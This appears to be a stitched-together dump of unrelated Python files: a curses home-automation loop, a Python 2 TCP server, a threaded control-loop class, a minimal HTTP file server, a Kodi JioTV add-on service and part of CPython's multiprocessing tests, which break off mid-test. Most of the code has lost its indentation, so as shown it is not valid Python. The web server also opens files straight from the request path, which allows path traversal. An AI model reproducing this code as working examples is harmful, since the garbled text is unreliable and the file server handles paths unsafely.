while flag != ord("0"):
screen.clear()
salutation(screen)
room_devices.print_device(screen)
temp, hum = sensor()
screen.addstr(4, 0, f"cômodo central. Humidade: {hum} Temperatura {temp}")
if(flag == ord("1")):
room = input_str(screen,2,50,"digite o nome do cômodo")
input_device = input_str(screen,2,50,"digite o nome do dispositivo de entrada")
output_device = input_str(screen,2,50,"digite o nome do dispositivo de saída")
room_devices.esp_defined_device.update({
room : {
"in": input_device,
"out": output_device
}
})
flag_device = input_str(screen,2,1,"digite 1 para definir o dispositivo ou 0 para usar o padrão")
y_pos += 1
if(int(flag_device)):
matricula = input_str(screen,2,50,"digite a matricula")
mac = input_str(screen,2,50,"digite o endereço mac")
thread = Thread(target=mqtt,args = (screen,room,y_pos,matricula,mac), daemon=True)
thread.start()
else:
thread = Thread(target=mqtt,daemon=True,args = (screen,room,y_pos))
thread.start()
elif (flag == ord("2")):
room_name = input_str(screen, 2, 50, "digite o nome do cômodo")
state = bool(
int(
input_str(
screen,
2,
1,
"digite seu estado(1 ou 0)")))
room_devices.device_set(room_name, state)
elif (flag == ord("3")):
screen.clear()
try:
room_devices.alarm_handle.terminate()
screen.addstr(6, 0, "alarme desligado")
except AttributeError:
screen.addstr(6, 0, "alarme não foi inicializado")
flag = screen.getch()
time.sleep(1)
except Exception as err:
curses.endwin()
try:
            # deallocating memory
room_devices.alarm_handle.close()
except:
pass
# it's easier to debug raising the error
raise err
curses.endwin()
try:
        # deallocating memory
room_devices.alarm_handle.close()
except:
pass
|
TCPserver.py
|
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#bind the ip and port that the server is going to listen on
server.bind((bind_ip,bind_port))
#listen max 5 clients
server.listen(5)
print "[*] Listening on %s:%d" %(bind_ip, bind_port)
#client-handling thread
def handle_client(client_socket):
#print out what the client sends
request = client_socket.recv(1024)
print "[*] Received: %s" % request
#send back a packet
client_socket.send("Wellcome to Blackpy")
client_socket.close()
#waiting for an incoming connection
while True:
    client,addr = server.accept() #<--- accepted client connection
#client = client socket
#addr = remote connection detail
print "[*] Accepted connection from: %s:%d" %(addr[0],addr[1])
#create a new thread object that points to our handle_client function,
#pass the client socket object as an argument.
client_handler = threading.Thread(target=handle_client, args=(client,))
#start the thread to handle the client connection
client_handler.start()
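#a matching test client -- minimal sketch in the same Python 2 style as the
#server above; the host/port simply mirror the bind values, run the server first:
#
# import socket
# client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# client.connect(("127.0.0.1", 9999))
# client.send("ping")
# response = client.recv(4096)
# print "[*] Server replied: %s" % response
# client.close()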
|
System.py
|
# -*- coding: utf-8 -*-
"""Models the whole thing.
Process, controller and a main loop."""
import threading
import time
import logging
class System(object):
"""
Manages the whole system.
process is the current controlled process.
controller is the current controller.
The whole system is executed in a separate thread.
The timer is also realized as separate thread.
"""
def __init__(self,stepsize=0.01,process=None,controller=None,logger=None):
self.process = process #: process to control
self.controller = controller #: controller for calculating control values
self.logger = logger #: logging instance
self.stepsize = stepsize #: step size of loop for simulations in seconds
self.run = 0 #: main loop in in continuous run mode
self.run_event = threading.Event() #: controls the main loop's turn (if set make another turn)
self.main_thread = threading.Thread(target=self.main_loop) #: the main loop thread
self.main_thread.setDaemon(1)
self.main_thread.start()
self.timer_event = threading.Event() #: periodic trigger for main loop
self.timer_thread = threading.Thread(target=self.timer_loop) #: calculation time independent periodic trigger generator
self.timer_thread.setDaemon(1)
self.timer_thread.start()
def main_loop(self):
"""Realize main control loop as separate thread, so it can be
running independently of the GUI timers"""
while 1:
self.run_event.wait() # wait for start impulse
if not self.run: # if only a step reset start impulse
self.run_event.clear()
try:
if self.process:
input = self.process.getStateValues()
output = self.process.getDefaultControlValues()
t0 = time.time()
if self.controller:
self.controller.calculate(input,output)
t1 = time.time()
self.process.doStep(self.stepsize)
t2 = time.time()
self.process.setControlValues(output)
if self.logger:
self.logger.log(input,output)
logging.warn("Time for controller %fms, Time for process %fms",(t1-t0)*1000,(t2-t1)*1000)
else:
self.run = 0
self.run_event.clear()
except:
self.run = 0
self.run_event.clear()
import traceback
traceback.print_exc()
# if run mode and is simulated, wait for next activation
if self.run:# and not self.process.no_timer:
self.timer_event.wait()
self.timer_event.clear()
def timer_loop(self):
"""Realize a timer, using sleep is usually more precise
than using the GUI timer"""
while 1:
self.run_event.wait() # only when running
time.sleep(self.stepsize) # wait until next impulse
self.timer_event.set() # activate timer impulse
def start(self):
"""Start the main loop."""
self.run = 1
self.run_event.set()
def stop(self):
"""Stop the main loop."""
self.run = 0
self.run_event.clear()
def step(self):
"""Make a single step of the main loop. ( = stop after one step)"""
self.run = 0
self.run_event.set()
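# Minimal usage sketch. DummyProcess and DummyController below are illustrative
# stand-ins, not part of this module; their method names are taken from the calls
# made in System.main_loop above.
if __name__ == "__main__":
    class DummyProcess(object):
        def __init__(self):
            self.state = {"x": 0.0}
        def getStateValues(self):
            return dict(self.state)
        def getDefaultControlValues(self):
            return {"u": 0.0}
        def doStep(self, stepsize):
            self.state["x"] += stepsize
        def setControlValues(self, output):
            pass
    class DummyController(object):
        def calculate(self, input, output):
            output["u"] = -input["x"]  # trivial proportional action
    system = System(stepsize=0.01, process=DummyProcess(), controller=DummyController())
    system.start()
    time.sleep(0.1)
    system.stop()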
|
web.py
|
import socket
import os
import threading
import sys
import framework
import logging
logging.basicConfig(level=logging.DEBUG,
format="%(asctime)s-%(filename)s[lineno:%(lineno)d]-%(levelname)s-%(message)s",
filename="longging.log",
filemode="a")
# HTTP web server class
class HttpWebServer(object):
def __init__(self, port):
        # create the TCP server socket
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # enable port reuse
tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
        # bind the port
tcp_server_socket.bind(("", port))
        # start listening
tcp_server_socket.listen(128)
        # keep the TCP server socket as an attribute of the web server object
self.tcp_server_socket = tcp_server_socket
    # handle a client request
    # neither the instance nor the class is needed here, so use a static method;
    # leave one blank line between methods and two between functions
@staticmethod
def handle_client_request(new_socket):
        # receive the client's request data
recv_data = new_socket.recv(4096)
        # if the request data is empty, close the socket and return
if len(recv_data) == 0:
new_socket.close()
return
        # decode the received bytes
recv_content = recv_data.decode("utf-8")
        # split the request data
request_list = recv_content.split(" ", maxsplit=2)
        # get the requested resource path
request_path = request_list[1]
print(request_path)
if request_path == "/":
request_path = "/index.html"
        # a path ending in .html is treated as a dynamic resource request
if request_path.endswith(".html"):
"""动态资源请求"""
logging.info("动态资源请求" + request_path)
            # dynamic requests are handed to the web framework, which needs the request parameters
            # all parameters passed to the web framework go into a dict
env = {
"request_path": request_path,
                # pass request header info; extra items can be added to this dict
}
            # let the framework handle the dynamic resource request
            # 1. the web framework returns its processing result to the web server
            # 2. the web server wraps that result into a response message for the
            #    browser, consisting of status, headers and response_body
            # tuple unpacking
status, headers, response_body = framework.handle_request(env)
print(status, headers, response_body)
            # response line
            response_line = "HTTP/1.1 %s\r\n" % status
            # response headers
response_header = ""
for header in headers:
                # tuple unpacking; header is a two-element tuple
response_header += "%s: %s\r\n" % header
            # response message
response_data = (response_line +
response_header +
"\r\n" +
response_body).encode("utf-8")
print(response_data)
            # send the response to the browser
new_socket.send(response_data)
            # close the connection
new_socket.close()
else:
"""静态资源请求"""
logging.info("静态资源请求" + request_path)
            # check whether the requested file exists
            # option 1: os.path.exists
            # if not os.path.exists("static"+request_path):
            #     print("static"+request_path+"not exist")
            #     return
            # option 2: try-except
try:
                # open the file and read its data; rb mode is used so image files open correctly
with open("static"+request_path, "rb") as file:
file_data = file.read()
except Exception as e:
                # reaching this point means the requested file does not exist, so return 404
                # response line
response_line = "HTTP/1.1 404 Not Found\r\n"
                # response headers
response_header = "Server: LRY/1.0\r\n"
                # blank line
                # response body
with open("static/error.html", "rb") as file:
file_data = file.read()
response_body = file_data
response = (response_line + response_header + "\r\n").encode("utf-8") + response_body
                # response is already bytes, no further encoding needed
                # # encode the data to bytes
                # response_data = response.encode("utf-8")
                # send the HTTP response data
new_socket.send(response)
else:
                # reaching this point means the requested file was found, so return 200
                # wrap the data in an HTTP response message and send it to the browser
                # response line
response_line = "HTTP/1.1 200 OK\r\n"
                # response headers
response_header = "Server: LRY/1.0\r\n"
                # blank line
                # response body
response_body = file_data
                # response_body is bytes here and cannot be concatenated with str, so encode the preceding strings
response = (response_line + response_header + "\r\n").encode("utf-8") + response_body
                # response is already bytes, no further encoding needed
                # # encode the data to bytes
                # response_data = response.encode("utf-8")
                # send the HTTP response data
new_socket.send(response)
finally:
                # close the connection socket
new_socket.close()
    # method that starts the server
def start(self):
        # loop waiting for client requests
while True:
            # wait for and accept a client connection
new_socket, ip_port = self.tcp_server_socket.accept()
            # reaching this point means the connection was established
            # the static method is called through the instance here
sub_thread = threading.Thread(target=self.handle_client_request, args=(new_socket,))
            # make it a daemon thread so it exits with the main thread
sub_thread.setDaemon(True)
            # start the worker thread
sub_thread.start()
def main():
    # get the command-line arguments
params = sys.argv
if len(params) != 2:
print("执行命令格式如下:python XXX.py 9000")
logging.warning("在终端执行程序参数不等于2")
return
    # check that the second argument consists of digits
if not params[1].isdigit():
print("执行命令格式如下:python XXX.py 9000")
logging.warning("在终端执行程序参数类型不是数字")
return
    # reaching this point means there are exactly 2 arguments and the port is numeric
port = int(params[1])
    # create the web server
web_server = HttpWebServer(port)
    # start the server
web_server.start()
# run only when executed as the main program
if __name__ == "__main__":
main()
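# Hypothetical sketch of the framework.handle_request contract used above (the real
# framework module is not included here). Based only on how the return value is
# consumed, it must return a status string, a list of (name, value) header tuples,
# and a text response body, for example:
#
# def handle_request(env):
#     request_path = env["request_path"]
#     if request_path == "/index.html":
#         status = "200 OK"
#         headers = [("Server", "LRY/1.0"), ("Content-Type", "text/html; charset=utf-8")]
#         body = "<h1>Hello from the framework</h1>"
#     else:
#         status = "404 Not Found"
#         headers = [("Server", "LRY/1.0")]
#         body = "<h1>Page not found</h1>"
#     return status, headers, body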
|
service.py
|
# -*- coding: utf-8 -*-
from resources.lib import proxy
from codequick import Script
from codequick.script import Settings
import SocketServer
import threading
from xbmc import Monitor
from kodi_six import xbmcgui
def serveForever(handler):
try:
handler.serve_forever()
except Exception as e:
Script.log(e, lvl=Script.DEBUG)
pass
SocketServer.ThreadingTCPServer.allow_reuse_address = True
_PORT = 48996
handler = SocketServer.ThreadingTCPServer(("", _PORT), proxy.JioTVProxy)
t = threading.Thread(target=serveForever, args=(handler,))
t.setDaemon(True)
t.start()
if not Settings.get_boolean("popup"):
xbmcgui.Dialog().ok("JioTV Notification", "Now you can create your custom playlist from BotAllen Dashboard. [CR]Find out more at [B]https://botallen.com/#dashboard[/B] [CR][CR]If you like this add-on then consider donating from [B]https://botallen.com/#donate[/B] [CR][CR]Github: [B]https://github.com/botallen/repository.botallen[/B] [CR]Discord: [B]https://botallen.com/discord[/B] [CR][CR][I]You can disable this popup from settings[/I]")
monitor = Monitor()
while not monitor.abortRequested():
if monitor.waitForAbort(10):
handler.shutdown()
handler.server_close()
break
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import test.support
import test.support.script_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
def latin(s):
return s.encode('latin')
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(100)
def test_terminate(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
p.terminate()
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
sys.stderr = open(testfn, 'w')
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
sys.stderr = open(testfn, 'w')
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason, code in (([1, 2, 3], 1), ('ignore this', 1)):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, code)
with open(testfn, 'r') as f:
self.assertEqual(f.read().rstrip(), str(reason))
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# Tolerate a delta of 30 ms because of the bad clock resolution on
# Windows (usually 15.6 ms)
self.assertGreaterEqual(delta, 0.170)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
